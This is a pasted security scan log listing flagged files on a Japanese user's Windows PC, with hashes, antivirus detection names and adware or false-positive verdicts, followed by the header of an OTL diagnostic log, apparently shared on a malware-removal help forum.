File path: c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\pjcajdjkhacidelppkfpjobgdjkafjaa\1.1\manifest.json
Publisher:
MD5: 7c800d4e4dae3ef3f65dee4960957746
SHA-1: 67fe3b17009cf66cd3b6b100e419caa78aac789d
Created: 2014/01/12 15:34:15
Detections: 1
Determination: Adware
- Reason Heuristics as Adware.Obscure.WebPick.ChromePlugin (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\eekmagkgglabkmaoecjndeboolfapocg\1.0\manifest.json
Publisher:
MD5: e2832fbedae560495781610b5c511afa
SHA-1: 95f9c6fe1ea5a6ee009bce1e9c215ef53fb5c108
Created: 2013/01/12 15:34:11
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.WebPick.YoutubeAdblocker.ChromePlugin.M (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\lfnkbkehickiiakkkdkhfaifpdkaobim\2.7\manifest.json
Publisher:
MD5: 2df44604a8b618be96a265130308516c
SHA-1: 8df8b294612d3e16cc381e101c5b9e35d5fa5013
Created: 2014/01/12 15:33:53
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.JustPlugIt.M (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\mihcahmgecmbnbcchbopgniflfhgnkff\127\manifest.json
Publisher:
MD5: 0d1242f2beff2a586e2da1ae64a85576
SHA-1: cdc4b635c3842fbd9716d699abe4acd00a2ed26c
Created: 2014/01/12 15:34:18
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Chrome.Extension.MailChecker (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\pjcajdjkhacidelppkfpjobgdjkafjaa\1.1\manifest.json
Publisher:
MD5: 7c800d4e4dae3ef3f65dee4960957746
SHA-1: 67fe3b17009cf66cd3b6b100e419caa78aac789d
Created: 2014/01/12 15:34:15
Detections: 1
Determination: Adware
- Reason Heuristics as Adware.Obscure.WebPick.ChromePlugin (Adware)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\roaming\microsoft\installer\{45a66726-69bc-466b-a7a4-12fcba4883d7}\hijackthis.exe
Publisher: Trend Micro Inc.
MD5: 29c81875332f7084321c3a82a9a7bf9f
SHA-1: 52c7a761d6c08f951f250ab6ee9bf67813e1112a
Created: 2013/08/24 1:23:34
Detections: 1
Determination: Ignore detections (false positive)
- Rising Antivirus as PE:Trojan.VBInject!1.6546 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\roaming\mozilla\firefox\profiles\huvep8mo.default\extensions\hgplugin@hangame.co.jp\plugins\hgstart.exe
Publisher: NHN Japan Corp.
Signer: NHN Japan Corporation
MD5: fe20398a13dd7aeeaf285fbcc79424c6
SHA-1: aac5d88c0087fc443e7ac73c29456cfe66a94de0
Created: 2014/06/30 1:40:55
Detections: 1
Determination: Inconclusive
- Norman as W32/Downloader (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\ryota\appdata\roaming\xlgames\xlkcsdownload_jp\xlkcsdownload_jp.exe
Publisher: Kamuse, Incorporated
Signer: Kamuse Co.,Ltd
MD5: 590cc4923dfdfbe33ae7f901b599ceb2
SHA-1: 398c7918b775b2af424e28f5f42b5e7d73376392
Created: 2014/08/10 22:43:24
Detections: 3
Determination: Ignore detections (false positive)
- Trend Micro House Call as TROJ_GEN.F47V0322 (Undefined)
- Comodo Security as Heur.Suspicious
- Dr.Web as DLOADER.Trojan (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files\limechat2\uninst.exe
Publisher:
MD5: d3100b9ab07ed6364a82f74d1630f467
SHA-1: 3d590bdbc070419bd1c1cc627295eb5a133f1cba
Created: 2014/04/27 3:25:23
Detections: 1
Determination: Ignore detections (false positive)
- SUPERAntiSpyware as PUP.Downloader (Adware)

---------------------------------------------------------------------------------

ＨＰログ３


File path: c:\program files\reference assemblies\microsoft\framework\v3.0\presentationframework.dll
Publisher: Microsoft Corporation
MD5: 4b737f8e182e591e296439a2bf7a7b1b
SHA-1: dd382910093f44d85b289f63422479cadf777efe
Created: 2014/11/13 20:26:21
Detections: 1
Determination: Inconclusive
- Avira AntiVirus as W32/Sality.AT (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files\utvideo\utv_cfg.exe
Publisher:
MD5: 62cb1798f5db762f0195a4a213646a07
SHA-1: c7fadc7f32ab6fefe229c146a247feb89f373001
Created: 2013/10/28 17:28:08
Detections: 2
Determination: Inconclusive
- nProtect as Trojan/W32.Agent.49152.ANL (Undefined)
- AhnLab V3 Security as Win-Trojan/Shutdowner.126976 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files\via\viaaud\viaaud.exe
Publisher: VIA
Signer: VIA Technologies Inc.
MD5: 2fadb479c5d257665052dc1422ae9ddf
SHA-1: 4293aaa0538bbb0b6c1160f98df98a6e9bfe8c30
Created: 2012/10/30 16:18:32
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\capcom\monster hunter frontier online\mhf.exe
Publisher:
MD5: 559575b576095ac53657a4ba77a943c4
SHA-1: aed4ef935eb54c7864f2ae225f0da908cbdebbf1
Created: 2014/08/21 4:39:32
Detections: 2
Determination: Ignore detections (false positive)
- Quick Heal as (Suspicious) - DNAScan
- ByteHero BDV as Virus.Win32.Heur.l

---------------------------------------------------------------------------------

File path: c:\program files (x86)\creative\プロダクト レジストレーション\japanese\inetreg.exe
Publisher: Creative Technology Ltd
Signer: Creative Technology Ltd
MD5: 71386e71d8ea3304b384097f9741ec0a
SHA-1: 478a50d94d78496222a098053a31e1f19efa4007
Created: 2012/10/31 18:21:39
Detections: 1
Determination: Ignore detections (false positive)
- nProtect as Trojan-Downloader/W32.Andromeda.755312 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\daemon tools lite\dthelper.exe
Publisher: Disc Soft Ltd
Signer: Disc Soft Ltd
MD5: 7bd824285ba0c820ef0eadb19528afd8
SHA-1: 0c14a9296bf1d497c6510055945680a757173e9d
Created: 2014/03/04 18:19:20
Detections: 1
Determination: Ignore detections (false positive)
- McAfee Web Gateway as Heuristic.BehavesLike.Win32.Suspicious-BAY.K

---------------------------------------------------------------------------------

File path: c:\program files (x86)\ffdshow\ffmpeg.dll
Publisher:
MD5: 044a62845e948918c5f4e35c63b77b14
SHA-1: 9e4049ace89ce38639ccf009152c2a65a0b5df8a
Created: 2014/02/15 0:25:24
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as W32.HfsAutoA (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\ffdshow\ff_liba52.dll
Publisher:
MD5: b116fad39e0ccab620ab459ae591a507
SHA-1: 6e079200bc552be47043cb7bf485ceeb40b00457
Created: 2014/02/15 0:25:24
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\ffdshow\ff_libdts.dll
Publisher:
MD5: 6111e47cc6a86055f793363bfd0e9219
SHA-1: 2f30e4172ae704299b76be6faf7d4de7c10b92fb
Created: 2014/02/15 0:25:24
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\ffdshow\ff_libmad.dll
Publisher:
MD5: 55e7b5f21b7108e8371b6d1efde85eb2
SHA-1: d23a32e6836a0741ba1a2fa147d8ce281005b48a
Created: 2014/02/15 0:25:24
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\ffdshow\libmpeg2_ff.dll
Publisher:
MD5: 30c891e093ec150ea74984386d320727
SHA-1: 74052846b3f9e71b353a80f565d5c9350df73c51
Created: 2014/02/15 0:25:24
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\ffdshow\tomsmocomp_ff.dll
Publisher:
MD5: 140ca094c599b172caecf2bc4ea51d03
SHA-1: 2b769c8fe3637f872bf375f277b48a7ae278d948
Created: 2014/02/15 0:25:24
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\installshield installation information\{33f7a957-a66d-45a1-badf-6576083b14e2}\setup.exe
Publisher: InstallShield Software Corporation
MD5: a81fb6afcc0503ebd21915f128d1836d
SHA-1: f8b5759afa5cb055c8d5ffce2718722671da0c20
Created: 2013/10/28 16:33:36
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Trojan/KillAV.nhz (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\k-opticom\eo\app\pingdns.dll
Publisher: Efficient Networks
Signer: Siemens Subscriber Networks LLC
MD5: 11b7b1c7806582e97cba88284fdaa782
SHA-1: 7cd908bf3c7d668a1248736fbdb987e5fe6a8311
Created: 2012/10/31 16:44:37
Detections: 1
Determination: Ignore detections (false positive)
- Prevx as Heuristic: Suspicious File With Mass Email Capabilities

---------------------------------------------------------------------------------

File path: c:\program files (x86)\k-opticom\eo\app\tangomanager.exe
Publisher: Efficient Networks Inc.
Signer: Siemens Subscriber Networks LLC
MD5: dda5c03f2ceebeff1eda761e746c41ac
SHA-1: 86b92e1b6f8b91611c200ff5ed8896921f44350f
Created: 2012/10/31 16:44:38
Detections: 1
Determination: Ignore detections (false positive)
- Prevx as Heuristic: Suspicious Hijacker (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\k-opticom\eo\app\tap.exe
Publisher:
Signer: Siemens Subscriber Networks LLC
MD5: 55f097d878319d374ca2dc778b4b08dd
SHA-1: b6228d09affa8b78564af5bd9cfb52129b813032
Created: 2012/10/31 16:44:38
Detections: 1
Determination: Ignore detections (false positive)
- Sunbelt AntiMalware as Trojan-Spy.Win32.Banker.E (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\ebueula.dll
Publisher: Microsoft Corporation
MD5: d1cfcad7f3ad257beccbf248e043703a
SHA-1: d1a512c7a747949af1932ed5a5486128f0a10478
Created: 1999/09/03 3:41:58
Detections: 1
Determination: Ignore detections (false positive)
- NANO AntiVirus as Trojan.Win32.Obfuscate.crokuk (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\emod.dll
Publisher:
MD5: 70e8ed1125538b5d74bf5407c6206ea4
SHA-1: 20f78e3a79317c07ce278eb9083671c9c2f1b1ec
Created: 2012/12/17 16:26:21
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as W32.JinofineN.Trojan (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\empires2.exe
Publisher: Microsoft Corporation
MD5: bc1a30f5a8a4828d80e9bced9c2a3caa
SHA-1: 0b4850ec610affe88c02b7a546e45b0b87067f2f
Created: 2000/07/29 6:33:14
Detections: 1
Determination: Ignore detections (false positive)
- Kingsoft AntiVirus as Win32.Malware.Generic.a.(kcloud) (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\ha312w32.dll
Publisher: MicroQuill Software Publishing, Inc.
MD5: ba83d7c4a9750d0edb7accaf17c49b09
SHA-1: decb10c809ccd9b47d135dd50384a4c094388695
Created: 1998/09/28 20:01:00
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as W32.HfsAutoB (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\uninstal.exe
Publisher: Microsoft Corporation
MD5: 9ee3ab2b115d5762c6c7c194f2e1f595
SHA-1: 65548c4f02ba4ed51e8e2ae5f2154edfdef96839
Created: 2000/09/28 4:17:58
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Virus.Win32.Part.a (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\wndmode.dll
Publisher:
MD5: 826ffb925e963318e72bfad04dc0835a
SHA-1: 445be1136297bf5ae1d0c03d43fb419e6a2bcf30
Created: 2012/12/17 16:26:20
Detections: 1
Determination: Ignore detections (false positive)
- ViRobot as Trojan.Win32.A.Downloader.276992.T (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\data\closedpw.exe
Publisher:
MD5: 6295c1c28ab5bbba657d448308830dfd
SHA-1: c403e034343a1aebc1909c305177465c6dfbada0
Created: 1997/09/10 12:44:40
Detections: 2
Determination: Ignore detections (false positive)
- K7 Gateway Antivirus as Trojan (Undefined)
- ViRobot as Trojan.Win32.PSWIGames.49152.BM (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\navel\俺たちに翼はないｒ\uninst.exe
Publisher:
MD5: 1548d04ea38626a54c053612c42f6c00
SHA-1: 434fba20c40c1dba7b36d3f745a76dc79f0ac932
Created: 2014/11/20 14:38:04
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as HW32.Pedka (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\niwango\nicoliveenc\xsplitgamesource.dll
Publisher: SplitmediaLabs Limited
MD5: a0c098e4c96c18a092a5b1df3ecac8e9
SHA-1: 95bc6ced5fc864bbc387e8089aca8a217de46f4c
Created: 2013/04/18 21:36:17
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\project64 2.1\plugin\1.6 plugins\jabo_dinput.dll
Publisher: Project64
MD5: d5f798c360aaac128b0fc4a211688ccd
SHA-1: 4b55d92fda42f108bd0e22503afd905754e95caf
Created: 2014/11/13 22:03:21
Detections: 1
Determination: Ignore detections (false positive)
- Agnitum Outpost as RiskWare.PEMalform (Adware)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\project64 2.1\plugin\1.6 plugins\jabo_direct3d8.dll
Publisher: Project64
MD5: ff57f60c58ede6364b980edcb311873b
SHA-1: 5ec6e231f780d9eafa6ee855e0f4968a7f8c347d
Created: 2014/11/13 22:03:21
Detections: 1
Determination: Ignore detections (false positive)
- Agnitum Outpost as RiskWare.PEMalform (Adware)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\project64 2.1\plugin\1.6 plugins\nrage_dinput8_v2.dll
Publisher: Gbs
MD5: f5296ecc4d6ea5605291de9203032a82
SHA-1: 8e72558a56adb82f3ed939c39f67718a0068400e
Created: 2014/11/13 22:03:21
Detections: 1
Determination: Ignore detections (false positive)
- Antiy Labs AVL as Packed/Win32.Klone.gen (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\quicktime\qtsystem\quicktimeupdatehelper.exe
Publisher: Apple Inc.
MD5: 6ba0a1e9e362d1df46bf747ba0f942fa
SHA-1: e39ffa0bdd613caa6e84df3cb4dd5dae6f2a2b3d
Created: 2014/01/17 16:24:00
Detections: 1
Determination: Ignore detections (false positive)
- Boost by Reason as Optional.Apple.V

---------------------------------------------------------------------------------

File path: c:\program files (x86)\segmentamplifier\segmentamplifier.dll
Publisher:
MD5: 1088823f5995b8bda197b6dfa0b40818
SHA-1: ed7c8a42748049f2c9932bd95cf502a6ce99eb6d
Created: 2015/02/25 17:41:13
Detections: 20
Determination: Adware
- Bkav FE as HW32.Packed (Undefined)
- MicroWorld eScan as Gen:Variant.Adware.Zusy.122341 (Adware)
- F-Prot as W32/S-f055c78a (Undefined)
- Trend Micro House Call as TROJ_GEN.R08NH09BB15 (Undefined)
- Bitdefender as Gen:Variant.Adware.Zusy.122341 (Adware)
- Lavasoft Ad-Aware as Gen:Variant.Adware.Zusy.122341 (Adware)
- Emsisoft Anti-Malware as Gen:Variant.Adware.Zusy.122341 (Adware)
- F-Secure as Gen:Variant.Adware.Zusy.122341 (Adware)
- McAfee Web Gateway as BehavesLike.Win32.AdwareBDSearch.tc (Adware)
- Sophos as Generic PUA ON (Undefined)
- Avira AntiVirus as ADWARE/MultiPlug.Gen4 (Adware)
- G Data as Gen:Variant.Adware.Zusy.122341 (Adware)
- AhnLab V3 Security as PUP/Win32.MultiPlug (Adware)
- McAfee as Artemis!1088823F5995 (Undefined)
- Baidu Antivirus as PUA.Win32.SProtector (Adware)
- ESET NOD32 as Win32/SProtector.O potentially unwanted (variant) (Adware)
- IKARUS anti.virus as PUA.SProtector (Adware)
- Panda Antivirus as Trj/Genetic.gen (Undefined)
- Qihoo 360 Security as Win32/Virus.Adware.f45 (Adware)
- Reason Heuristics as Threat.Win.Reputation.IMP (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\tk3\tk3.exe
Publisher: INTERHEART CO., LTD.
MD5: 9a895c4dd01bbeae4ff651c1516a8a55
SHA-1: 0c7be3beb5c00f66444d40cafe0cdd15e0ca9063
Created: 2011/03/08 1:00:00
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\trend micro\hijackthis\hijackthis.exe
Publisher: Trend Micro Inc.
MD5: 29c81875332f7084321c3a82a9a7bf9f
SHA-1: 52c7a761d6c08f951f250ab6ee9bf67813e1112a
Created: 2010/03/25 18:42:36
Detections: 1
Determination: Ignore detections (false positive)
- Rising Antivirus as PE:Trojan.VBInject!1.6546 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\trend micro\hijackthis\backups\backup-20150404-173048-813.dll
Publisher:
MD5: aafedd814bba50c1bf3f9a61799f63f4
SHA-1: c4bff3c9e6b4ef530c21a9e16f8954ac916b5e46
Created: 2015/03/06 9:10:08
Detections: 37
Determination: Adware
- Bkav FE as W32.GueteycosLTR.Trojan (Undefined)
- MicroWorld eScan as Gen:Variant.Adware.Zusy.121779 (Adware)
- Malwarebytes as PUP.Optional.Multiplug.A (Adware)
- Zillya! Antivirus as Adware.MultiPlug.Win32.230694 (Adware)
- SUPERAntiSpyware as Adware.MultiPlug/Variant (Adware)
- K7 Gateway Antivirus as Adware (Adware)
- K7 AntiVirus as Adware (Adware)
- NANO AntiVirus as Trojan.Win32.XPACK.doyjfa (Undefined)
- F-Prot as W32/S-6ad1b408 (Undefined)
- Trend Micro House Call as TROJ_GEN.R02KC0ECC15 (Undefined)
- avast! as Win32:PUP-gen [PUP] (Adware)
- Bitdefender as Gen:Variant.Adware.Zusy.121779 (Adware)
- Agnitum Outpost as PUA.MultiPlug (Adware)
- Lavasoft Ad-Aware as Gen:Variant.Adware.Zusy.121779 (Adware)
- Emsisoft Anti-Malware as Gen:Variant.Adware.Zusy.121779 (Adware)
- Comodo Security as Application.Win32.AdWare.MultiPlug.VB (Adware)
- F-Secure as Gen:Variant.Adware.Zusy (Adware)
- Dr.Web as Trojan.Crossrider1.21906 (Adware)
- VIPRE Antivirus as Trojan.Win32.Generic (Undefined)
- Trend Micro as TROJ_GEN.R02KC0ECC15 (Undefined)
- McAfee Web Gateway as Multiplug-FNZ (Undefined)
- Sophos as MultiPlug (Undefined)
- Jiangmin as Adware/Agent.aksh (Adware)
- Avira AntiVirus as TR/Crypt.XPACK.Gen7
- Antiy Labs AVL as Trojan/Win32.TSGeneric (Undefined)
- G Data as Gen:Variant.Adware.Zusy.121779 (Adware)
- AhnLab V3 Security as Adware/Win32.Agent (Adware)
- McAfee as Multiplug-FNZ (Undefined)
- Vba32 AntiVirus as AdWare.Agent (Adware)
- Baidu Antivirus as Adware.Win32.MultiPlug (Adware)
- ESET NOD32 as Win32/Adware.MultiPlug.FL (variant) (Adware)
- Rising Antivirus as PE:Adware.Zusy!6.1F0B (Adware)
- Fortinet FortiGate as Riskware/MultiPlug (Undefined)
- AVG as Generic6 (Undefined)
- Panda Antivirus as Trj/Genetic.gen (Undefined)
- Qihoo 360 Security as Win32/Trojan.cb1 (Undefined)
- Reason Heuristics as Threat.Win.Reputation.IMP (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\trend micro\hijackthis\backups\backup-20150404-191940-416.dll
Publisher:
MD5: 8fabf78be053de024e9c6bb1d87e5032
SHA-1: 3ac44421b2732f075f0c697414d16fca1d2fb575
Created: 2015/03/24 16:16:35
Detections: 29
Determination: Adware
- MicroWorld eScan as Gen:Variant.Adware.Zusy.121779 (Adware)
- McAfee as MultiPlug-FNZ (Undefined)
- Malwarebytes as PUP.Optional.Multiplug.A (Adware)
- Agnitum Outpost as Trojan.Agent (Undefined)
- F-Prot as W32/S-df2a10d9 (Undefined)
- Trend Micro House Call as TROJ_GEN.R047C0OCS15 (Undefined)
- avast! as Win32:Adware-gen [Adw] (Adware)
- Kaspersky as HEUR:Trojan.Win32.Generic (Undefined)
- Bitdefender as Gen:Variant.Adware.Zusy.121779 (Adware)
- NANO AntiVirus as Trojan.Win32.Crossrider1.dpmkgj (Adware)
- SUPERAntiSpyware as Adware.MultiPlug/Variant (Adware)
- Lavasoft Ad-Aware as Gen:Variant.Adware.Zusy.121779 (Adware)
- Emsisoft Anti-Malware as Gen:Variant.Adware.Zusy.121779 (Adware)
- Comodo Security as Application.Win32.AdWare.MultiPlug.VB (Adware)
- F-Secure as Gen:Variant.Adware.Zusy (Adware)
- Dr.Web as Trojan.Crossrider1.22889 (Adware)
- VIPRE Antivirus as Trojan.Win32.Generic (Undefined)
- Trend Micro as TROJ_GEN.R047C0OCS15 (Undefined)
- McAfee Web Gateway as MultiPlug-FNZ (Undefined)
- Sophos as MultiPlug (Undefined)
- ESET NOD32 as Win32/Adware.MultiPlug.FL (variant) (Adware)
- Antiy Labs AVL as Trojan/Win32.TSGeneric (Undefined)
- AhnLab V3 Security as Adware/Win32.Agent (Adware)
- G Data as Gen:Variant.Adware.Zusy.121779 (Adware)
- Baidu Antivirus as Adware.Win32.MultiPlug (Adware)
- Fortinet FortiGate as W32/MultiPlug.FL!tr (Undefined)
- AVG as Generic6 (Undefined)
- Qihoo 360 Security as Win32/Trojan.cb1 (Undefined)
- Reason Heuristics as Threat.Win.Reputation.IMP (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\trend micro\hijackthis\backups\backup-20150404-191940-520.dll
Publisher:
MD5: aafdcae081ecb1e24f261854fe44344b
SHA-1: aef1cb6da3c2dee6b6dd7b6ed001cddb78675183
Created: 2015/03/24 16:16:52
Detections: 35
Determination: Adware
- MicroWorld eScan as Gen:Variant.Adware.Zusy.121779 (Adware)
- McAfee as MultiPlug-FNZ (Undefined)
- Malwarebytes as PUP.Optional.Multiplug.A (Adware)
- Zillya! Antivirus as Adware.MultiPlug.Win32.241156 (Adware)
- SUPERAntiSpyware as Adware.MultiPlug/Variant (Adware)
- K7 Gateway Antivirus as Adware (Adware)
- K7 AntiVirus as Adware (Adware)
- NANO AntiVirus as Trojan.Win32.Crossrider1.dpmkgj (Adware)
- F-Prot as W32/S-df2a10d9 (Undefined)
- Trend Micro House Call as TROJ_GEN.R047C0ECU15 (Undefined)
- avast! as Win32:Adware-gen [Adw] (Adware)
- Kaspersky as HEUR:Trojan.Win32.Generic (Undefined)
- Bitdefender as Gen:Variant.Adware.Zusy.121779 (Adware)
- Agnitum Outpost as Trojan.Agent (Undefined)
- Lavasoft Ad-Aware as Gen:Variant.Adware.Zusy.121779 (Adware)
- Sophos as MultiPlug (Undefined)
- Comodo Security as Application.Win32.AdWare.MultiPlug.VB (Adware)
- F-Secure as Gen:Variant.Adware.Zusy (Adware)
- Dr.Web as Trojan.Crossrider1.22889 (Adware)
- VIPRE Antivirus as Trojan.Win32.Generic (Undefined)
- Trend Micro as TROJ_GEN.R047C0ECU15 (Undefined)
- McAfee Web Gateway as MultiPlug-FNZ (Undefined)
- Emsisoft Anti-Malware as Gen:Variant.Adware.Zusy.121779 (Adware)
- Jiangmin as Adware/Agent.araf (Adware)
- Avira AntiVirus as TR/Crypt.XPACK.Gen7
- Antiy Labs AVL as Trojan/Win32.TSGeneric (Undefined)
- G Data as Gen:Variant.Adware.Zusy.121779 (Adware)
- AhnLab V3 Security as Adware/Win32.Agent (Adware)
- Baidu Antivirus as Adware.Win32.MultiPlug (Adware)
- ESET NOD32 as Win32/Adware.MultiPlug.FL (variant) (Adware)
- Fortinet FortiGate as Riskware/MultiPlug (Undefined)
- AVG as Generic6 (Undefined)
- Panda Antivirus as Trj/Genetic.gen (Undefined)
- Qihoo 360 Security as Win32/Trojan.cb1 (Undefined)
- Reason Heuristics as Threat.Win.Reputation.IMP (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\via\viaudioi\vdeck\viaaud.exe
Publisher: VIA
Signer: VIA Technologies Inc.
MD5: 87ebc6718a3c7a9a744570ac6cc7f459
SHA-1: 6c17b36324043f8c408ade822d1aaf079675c2ef
Created: 2012/10/30 16:18:35
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\autoupdate-windows.exe
Publisher: Xvid Team
MD5: b9b5c142c75e7e2a95e7e958cf6eab3a
SHA-1: a88218ec8a6227754fb03acfabe7cca12a11c23a
Created: 2014/02/15 0:25:23
Detections: 1
Determination: Ignore detections (false positive)
- Boost by Reason as Optional.XvidTeam.S

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\checkupdate.exe
Publisher:
MD5: 6d9e1356a9c1b5f36698faff9205e34a
SHA-1: 37433a3bf4ef209b1b159e5f379d26c46ebd6008
Created: 2014/02/15 0:25:23
Detections: 1
Determination: Ignore detections (false positive)
- Boost by Reason as Optional.Startup.L

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\minicalc.exe
Publisher:
MD5: 7ce40a557359849ea374e0e4dde52e26
SHA-1: d865e7ef9c41d8c622ec87577685f3e1868f420e
Created: 2014/02/15 0:25:22
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Posible_Worm32 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\ogmcalc.exe
Publisher:
MD5: 95caef9da6e9aee1ecd627527cfa0f38
SHA-1: f0ce07a0c7da2f0239ebfe3ca37cd03332d80f0b
Created: 2014/02/15 0:25:22
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Posible_Worm32 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\statsreader.exe
Publisher:
MD5: 487af46145b81c5bc54873e764f93636
SHA-1: f948b0544c59127e8845eef915f2ec3b6b1c3508
Created: 2014/02/15 0:25:23
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Posible_Worm32 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\uninstall.exe
Publisher:
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA-1: da39a3ee5e6b4b0d3255bfef95601890afd80709
Created: 2014/02/15 0:25:27
Detections: 11
Determination: Ignore detections (false positive)
- Lavasoft Ad-Aware as Gen:Variant.Zusy.122341 (Undefined)
- ESET NOD32 as Win32/Bundlore.S potentially unwanted application (Adware)
- Avira AntiVirus as TR/ATRAPS.Gen (Undefined)
- Kaspersky as not-a-virus:RiskTool.Win32.SProtector (Adware)
- Dr.Web as Adware.Salus.7, Adware.Salus.5 (Adware)
- Microsoft Security Essentials as Worm:Win32/Yuner.A (Undefined)
- avast! as Malware-gen (Undefined)
- Clam AntiVirus as Win.Trojan.Agent-827002 (Undefined)
- F-Secure as Win32.Sality.OG (Undefined)
- F-Prot as W32/Podnuha.B.gen (Undefined)
- Reason Heuristics as Threat.Win.Reputation.thinkcellSoftwareGmbH (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\vidccleaner.exe
Publisher:
MD5: 6b5e418a9c02ab0c3f3dd50b0e3cd3a6
SHA-1: d7e976b79de0e822f41845f45c6311d11d2179d0
Created: 2014/02/15 0:25:23
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Posible_Worm32 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\xvid_encraw.exe
Publisher:
MD5: 6ad766e0133c15132877fe64a50d3ebc
SHA-1: f7abafbf94fa1e64a023fda36edc119ca8e2b631
Created: 2014/02/15 0:25:20
Detections: 3
Determination: Inconclusive
- Trend Micro House Call as TROJ_GEN.F47V0715 (Undefined)
- Antiy Labs AVL as Trojan/Win32.Generic.gen (Undefined)
- Kingsoft AntiVirus as Win32.Troj.Undef.(kcloud) (Undefined)

以上です。

以下にＯＴＬのログを貼っていきます。

ＯＴＬログ１

OTL logfile created on: 2015/04/21 1:47:20 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ryota\Desktop
64bit- An unknown product (Version = 6.3.9600) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17728)
Locale: 00000411 | Country: 日本 | Language: JPN | Date Format: yyyy/MM/dd

7.88 Gb Total Physical Memory | 6.58 Gb Available Physical Memory | 83.54% Memory free
9.13 Gb Paging File | 7.90 Gb Available in Paging File | 86.54% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 456.99 Gb Total Space | 35.25 Gb Free Space | 7.71% Space Free | Partition Type: NTFS

Computer Name: NAMETUKI | User Name: ryota | Logged in as Administrator.
Boot Mode: SafeMode | Scan Mode: All users | Include 64bit Scans
